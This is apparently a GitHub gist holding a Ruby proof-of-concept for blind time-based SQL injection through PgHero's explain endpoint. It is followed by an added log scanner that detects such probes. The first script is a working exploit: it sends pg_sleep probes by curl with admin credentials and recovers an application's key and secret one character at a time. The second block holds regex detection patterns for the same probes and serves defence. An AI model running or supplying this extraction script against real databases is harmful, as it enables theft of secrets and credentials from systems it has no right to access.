@derwiki
Last active April 23, 2019 12:30
Blind time-based SQL injection attack, proof of concept (with PgHero)
```ruby
# More information available at https://www.owasp.org/index.php/Blind_SQL_Injection

# Seconds the database is asked to sleep when a guessed character is correct.
# Any round trip longer than this is treated as a "yes" answer.
POSITIVE_DELAY = 2
CHARS = ('A'..'Z').to_a + ('a'..'z').to_a + ('0'..'9').to_a

# Build one probe: sleep only if the character at `pos` of `field` equals `char`.
def query(table, field, id, char, pos)
  %Q[SELECT CASE WHEN substr(#{field}, #{pos}, 1) = \'#{char}\' THEN pg_sleep(#{POSITIVE_DELAY}) ELSE NULL END FROM #{table} WHERE id = #{id} ;]
end

# Wall-clock seconds taken by the block.
def timeit
  t0 = Time.now
  yield
  Time.now - t0
end

# Run the probe directly through psql; true when the sleep fired.
def sql_test(table, field, id, char, pos)
  cmd = %Q[psql mydatabase -c "#{query(table, field, id, char, pos)}"]
  timeit { `#{ cmd }` } > POSITIVE_DELAY
end

# Run the same probe through PgHero's explain endpoint; true when the sleep fired.
def curl_test(table, field, id, char, pos)
  cmd = <<-CMD.gsub("\n", ' ')
    curl --silent -d "query=#{query(table, field, id, char, pos)}" -d "commit=Analyze"
    --user admin:password
    https://myhost.com/pghero/explain
  CMD
  timeit { `#{ cmd }` } > POSITIVE_DELAY
end

# Recover a field one character at a time, trying every candidate per position.
def retrieve_field(table, field, id)
  buffer = ""
  (1..255).each do |pos|
    found = false
    CHARS.each do |char|
      if curl_test(table, field, id, char, pos)
        puts "#{pos}: #{char}"
        buffer << char
        found = true
        break # once a match is found, move on
      end
    end
    break unless found # if nothing matched, treat as end of string
  end
  buffer
end

key = retrieve_field('apps', 'key', 1)
puts "key: #{key}"
secret = retrieve_field('apps', 'secret', 1)
puts "secret: #{secret}"
```
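From the defender's side, probes of the shape above are easy to spot in PostgreSQL statement logs, and the statement duration tells you which guesses succeeded. The following is an added example (not part of the gist) that scans log lines for `CASE WHEN substr(...) ... pg_sleep(...)` probes and reconstructs the characters an attacker confirmed; the log line format and the sample lines are constructed assumptions.

```ruby
# One line of a log produced with log_min_duration_statement = 0 (constructed format).
LOG_RE   = /duration:\s+([\d.]+)\s+ms\s+statement:\s+(.*)$/
# The probe shape used in the gist: CASE WHEN substr(field, pos, 1) = 'c' THEN pg_sleep(n)
PROBE_RE = /CASE\s+WHEN\s+substr(?:ing)?\s*\(\s*(\w+)\s*,\s*(\d+)\s*,\s*1\s*\)\s*=\s*'(.)'\s*THEN\s+pg_sleep\s*\(\s*([\d.]+)\s*\)/i
TABLE_RE = /\bFROM\s+(\w+)/i
SLEEP_RE = /\bpg_sleep\s*\(/i

# Constructed sample: two probes of apps.secret (one guess right, one wrong) and one benign query.
SAMPLE_LOG = <<~LOG
  2019-04-23 12:30:01 UTC LOG:  duration: 2004.118 ms  statement: SELECT CASE WHEN substr(secret, 3, 1) = 'k' THEN pg_sleep(2) ELSE NULL END FROM apps WHERE id = 1 ;
  2019-04-23 12:30:02 UTC LOG:  duration: 1.204 ms  statement: SELECT CASE WHEN substr(secret, 3, 1) = 'm' THEN pg_sleep(2) ELSE NULL END FROM apps WHERE id = 1 ;
  2019-04-23 12:30:03 UTC LOG:  duration: 0.512 ms  statement: SELECT id, name FROM apps WHERE id = 1;
LOG

def parse_probe(sql)
  m = PROBE_RE.match(sql)
  return nil unless m
  t = TABLE_RE.match(sql)
  { table: t && t[1], field: m[1], pos: m[2].to_i, char: m[3], delay_s: m[4].to_f }
end

# Returns one event per suspicious statement. A probe whose duration reached the
# requested sleep is a "hit": the attacker learned that character was correct.
def scan_log(text)
  events = []
  text.each_line do |line|
    m = LOG_RE.match(line.chomp)
    next unless m
    duration_ms, sql = m[1].to_f, m[2].strip
    probe = parse_probe(sql)
    next unless probe || sql.match?(SLEEP_RE) # any pg_sleep in app traffic is worth a look
    hit = probe ? duration_ms >= probe[:delay_s] * 1000 : false
    events << { sql: sql, duration_ms: duration_ms, probe: probe, hit: hit }
  end
  events
end

# Scope the exposure: map "table.field" => { position => confirmed character }.
def leaked_chars(events)
  events.each_with_object({}) do |e, acc|
    next unless e[:hit]
    key = "#{e[:probe][:table]}.#{e[:probe][:field]}"
    (acc[key] ||= {})[e[:probe][:pos]] = e[:probe][:char]
  end
end

if __FILE__ == $PROGRAM_NAME
  scan_log(SAMPLE_LOG).each { |e| puts "#{e[:hit] ? 'HIT  ' : 'probe'} #{e[:duration_ms]}ms #{e[:probe].inspect}" }
  p leaked_chars(scan_log(SAMPLE_LOG))
end
```

Pattern matching catches the wrong guesses too, which is the bulk of the traffic, so alerting on the probe count rather than on slow queries alone gives far earlier warning.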